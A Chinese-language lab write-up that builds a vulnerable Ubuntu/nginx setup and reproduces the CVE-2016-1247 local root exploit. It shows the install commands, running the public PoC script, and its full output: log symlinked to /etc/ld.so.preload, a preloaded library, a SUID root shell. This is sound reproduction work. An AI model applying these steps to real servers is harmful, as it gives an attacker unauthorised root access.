CVE-2016-1247 nginx提权环境搭建

nginx 提权漏洞

只是一个复现的过程，环境搭建。具体分析见创宇的一篇文章，写的很详细。
http://blog.knownsec.com/2016/11/nginx-exploit-deb-root-privesc-cve-2016-1247/

安装说明

ubuntu 14.04 32bit
nginx 1.4.6-1ubuntu3

参考：
http://bbs.77169.com/forum.php?mod=viewthread&tid=355577

安装过程

首先尝试安装nginx 1.4.6-1ubuntu3，但是报错。

nginx@ubuntu:~$ sudo apt-get install nginx=1.4.6-1ubuntu3
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 nginx : Depends: nginx-core (< 1.4.6-1ubuntu3.1~) but it is not going to be installed or
                  nginx-full (< 1.4.6-1ubuntu3.1~) but it is not going to be installed or
                  nginx-light (< 1.4.6-1ubuntu3.1~) but 1.4.6-1ubuntu3.7 is to be installed or
                  nginx-extras (< 1.4.6-1ubuntu3.1~) but it is not going to be installed or
                  nginx-naxsi (< 1.4.6-1ubuntu3.1~) but it is not going to be installed
E: Unable to correct problems, you have held broken packages.

因此安装一下nginx-full=1.4.6-1ubuntu3

nginx@ubuntu:~$ sudo apt-get install nginx-full=1.4.6-1ubuntu3
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 nginx-full : Depends: nginx-common (= 1.4.6-1ubuntu3) but 1.4.6-1ubuntu3.7 is to be installed
E: Unable to correct problems, you have held broken packages.

因此安装步骤

sudo apt-get install nginx-common=1.4.6-1ubuntu3
sudo apt-get install nginx-full=1.4.6-1ubuntu3
sudo apt-get install nginx=1.4.6-1ubuntu3

安装版本为

nginx@ubuntu:~$ dpkg -l |grep nginx
ii  nginx                                                 1.4.6-1ubuntu3                                      all          small, powerful, scalable web/proxy server
ii  nginx-common                                          1.4.6-1ubuntu3                                      all          small, powerful, scalable web/proxy server - common files
ii  nginx-full                                            1.4.6-1ubuntu3                                      i386         nginx web/proxy server (standard version)

查看文件夹权限

nginx@ubuntu:/var/log$ ls -ld ./nginx/
drwxr-x--- 2 www-data adm 4096 May 15 05:41 ./nginx/

属于www-data用户的 说明是没有补丁的。

运行&复现

nginx运行

nginx@ubuntu:~$ sudo nginx
nginx@ubuntu:~$ ps -A |grep nginx
10354 ?        00:00:00 nginx
10355 ?        00:00:00 nginx
10356 ?        00:00:00 nginx
10357 ?        00:00:00 nginx
10358 ?        00:00:00 nginx

查看log/nginx文件夹下文件权限。

nginx@ubuntu:/var/log/nginx$ ll
total 8
drwxr-x---  2 www-data adm    4096 May 15 06:04 ./
drwxrwxr-x 15 root     syslog 4096 May 15 05:46 ../
-rw-r--r--  1 root     root      0 May 15 06:04 access.log
-rw-r--r--  1 root     root      0 May 15 06:04 error.log

error.log是root用户并且属于root用户组的。
若是属于www-data用户的话，可以先kill掉nginx，然后删除nginx文件夹下的所有文件；然后重启nginx即可。

切换至www-data下

因此是no-login状态，所以不能直接切换，需要修改。

nginx@ubuntu:/var/log/nginx$ gedit /etc/passwd
### to /bin/bash
www-data:x:33:33:www-data:/var/www:/bin/bash

切换

nginx@ubuntu:~/Desktop$ su
Password: 
root@ubuntu:/home/nginx/Desktop# sudo www-data
sudo: www-data: command not found
root@ubuntu:/home/nginx/Desktop# su www-data
www-data@ubuntu:/home/nginx/Desktop$

执行PoC

www-data@ubuntu:/home/nginx/Desktop$ ./nginxed-root.sh /var/log/nginx/error.log 
[......]
[+] Starting the exploit as: 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at: 
-rwxr-xr-x 1 www-data www-data 986672 May 15 06:11 /tmp/nginxrootsh

[+] The server appears to be (N)jinxed (writable logdir) ! :) Symlink created at: 
lrwxrwxrwx 1 www-data www-data 18 May 15 06:11 /var/log/nginx/error.log -> /etc/ld.so.preload

[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am...

切换至root权限下，强制log回滚

root@ubuntu:/var/log/nginx# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx

拿到root权限

[+] The server appears to be (N)jinxed (writable logdir) ! :) Symlink created at: 
lrwxrwxrwx 1 www-data www-data 18 May 15 06:11 /var/log/nginx/error.log -> /etc/ld.so.preload

[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am...


[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: 
-rw-r--r-- 1 www-data root 19 May 15 06:12 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains: 
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
-rwsrwxrwx 1 root root 986672 May 15 06:11 /tmp/nginxrootsh

[+] Rootshell got assigned root SUID perms at: 
-rwsrwxrwx 1 root root 986672 May 15 06:11 /tmp/nginxrootsh

The server is (N)jinxed ! ;) Got root via Nginx!

[+] Spawning the rootshell /tmp/nginxrootsh now! 

nginxrootsh-4.3# 
nginxrootsh-4.3# 
nginxrootsh-4.3# whoami
root

进一步了解该漏洞参考

https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
http://blog.knownsec.com/2016/11/nginx-exploit-deb-root-privesc-cve-2016-1247/